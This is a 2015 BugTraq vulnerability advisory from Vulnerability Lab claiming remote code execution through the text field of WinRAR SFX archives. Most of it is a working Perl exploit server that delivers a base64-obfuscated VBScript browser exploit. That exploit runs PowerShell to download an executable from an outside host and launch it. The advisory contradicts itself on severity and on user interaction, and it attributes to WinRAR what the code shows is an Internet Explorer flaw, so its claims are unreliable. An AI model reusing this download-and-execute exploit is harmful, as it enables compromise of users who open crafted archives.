BugTraq
WinRAR SFX v5.21 - Remote Code Execution Vulnerability Sep 28 2015 08:24AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
WinRAR SFX v5.21 - Remote Code Execution Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1608

Video: https://www.youtube.com/watch?v=fo0l0oT4468

Release Date:
=============
2015-09-28

Vulnerability Laboratory ID (VL-ID):
====================================
1608

Common Vulnerability Scoring System:
====================================
9

Product & Service Introduction:
===============================
WinRAR with over 500 million users worldwide by far the most popular compression program and therefore the best way to files securely and
efficiently to pack for a data transfer to speed up the data transfer via e-mail and secure storage optimized files.

(Copy of the Homepage: http://www.win-rar.com/start.html )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official WInRAR SFX v5.21 software.

Vulnerability Disclosure Timeline:
==================================
2015-09-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
A remote code execution vulnerability has been discovered in the official WInRAR SFX v5.21 software.
The vulnerability allows remote attackers to unauthorized execute system specific code to comrpomise a target system.

The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are
able to generate own compressed archives with maliciuous payloads to execute system specific codes for compromise. The attackers
saved in the sfx archive input the malicious generated html code. Thus results in a system specific code execution when a target
user or system is processing to open the comprossed archive.

The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.2.
Exploitation of the code execution vulnerability requires low user interaction (open file) without privilege system or restricted user accounts.
Successful exploitation of the remote code execution vulnerability in the WinRAR SFX software results in system, network or device compromise.

Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privilege system user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Run perl code : perl poc.pl
2. Right Click on any file and select "add to archive..."
3. Select "Create SFX archive"
4. Go to the Advanced Menu and select "SFX options..."
5. Go to the "Text and icon" Menu
6. Copy this perl output (HTML) and past on "Text to display in SFX window"
7. Click OK -- OK
8. Your SFX file Created
9. Just open sfx file
10. Your Link Download/Execute on your target
11. Successful reproduce of the code execution vulnerability!

PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRaR SFX - Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7 / Server 2008
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/rezasp
# E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website: www.reza.es
# Twitter: https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.espargham
#
# ID: MS14-064

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

print " Mohammad Reza Espargham\n\n";
my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));

my $port = 80;

print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n" if($port==80);
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . '"></head></html>'."\n\n" if($port!=80);

my $server = new IO::Socket::INET( Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
ReuseAddr => 1)
or die "Unable to create server socket";

# Server loop
while(my $client = $server->accept())
{
my $client_info;
while(<$client>)
{
last if /^\r\n$/;
$client_info .= $_;
}
incoming($client, $client_info);
}

sub incoming
{
print "\n=== Incoming Request:\n";
my $client = shift;
print $client &buildResponse($client, shift);
close($client);
}

sub buildResponse
{
my $client = shift;
my $client_info = shift;

my $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbn
Q9IklFPUVt
dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0i
VkJT
Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0
IHNo
ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2Ut
RXhw
cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmls
ZSgn
aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5l
eGUn
LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVs
bEV4
ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhl
Iiwg
Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9z
Y3Jp
cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAg
IGFi
KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGlt
ICAg
aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApC
ZWdp
bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1O
YXZp
Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgog
ICAg
IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4w
KSAg
IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIo
aW5m
bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAog
ICAg
ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBD
cmVh
dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2
KSZj
aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQog
ICAg
IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDAp
CiAK
ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxi
cj4g
SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5z
aGVs
bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRu
b3Rz
YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u
IEJl
Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUp
CiAg
IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0
aW9u
IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxz
ZQog
IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0
ZT1U
cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAK
c3Vi
IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVz
dW1l
IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBh
YShh
MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4
NzM3
NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4
NTM0
NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUg
YWEo
YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAg
T24g
RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAg
aT1y
dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVw
IDQK
ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAg
ICAg
ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIp
ICAg
ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAg
ICBy
ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1
bShp
KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAg
ICAg
ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwog
ICAg
cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJv
ciBS
ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAg
ICBh
MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0g
IFBy
ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAg
UHJl
c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIz
NDU2
Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmpl
Y3Qo
YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgog
ICAg
ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFy
dHlw
ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRo
ZW4K
ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAg
ICAg
ICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAg
ICAK
ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAg
ICAg
IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAg
IGVs
c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4
aXQg
IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAg
IGlm
KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09i
amVj
dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5
cGUo
YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAg
ICBl
bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAK
ICAg
IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAg
ICAg
CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVy
PVRy
dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2
ZSBh
YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0o
YWRk
KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIp
ICAK
ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42
OTc1
OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAg
IGFi
KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3Jp
cHQ+
CiAKPC9ib2R5Pgo8L2h0bWw+";
$poc = decode_base64($poc);

my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n
$poc";
return $r;
}

Security Risk:
==============
The security risk of the code execution vulnerability in the winrar sfx software is estimated as high. (CVSS 7.4)

Credits & Authors:
==================
Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (me (at) reza (dot) es [email concealed] or reza.espargham (at) gmail (dot) com [email concealed]] (www.reza.es)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]�

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus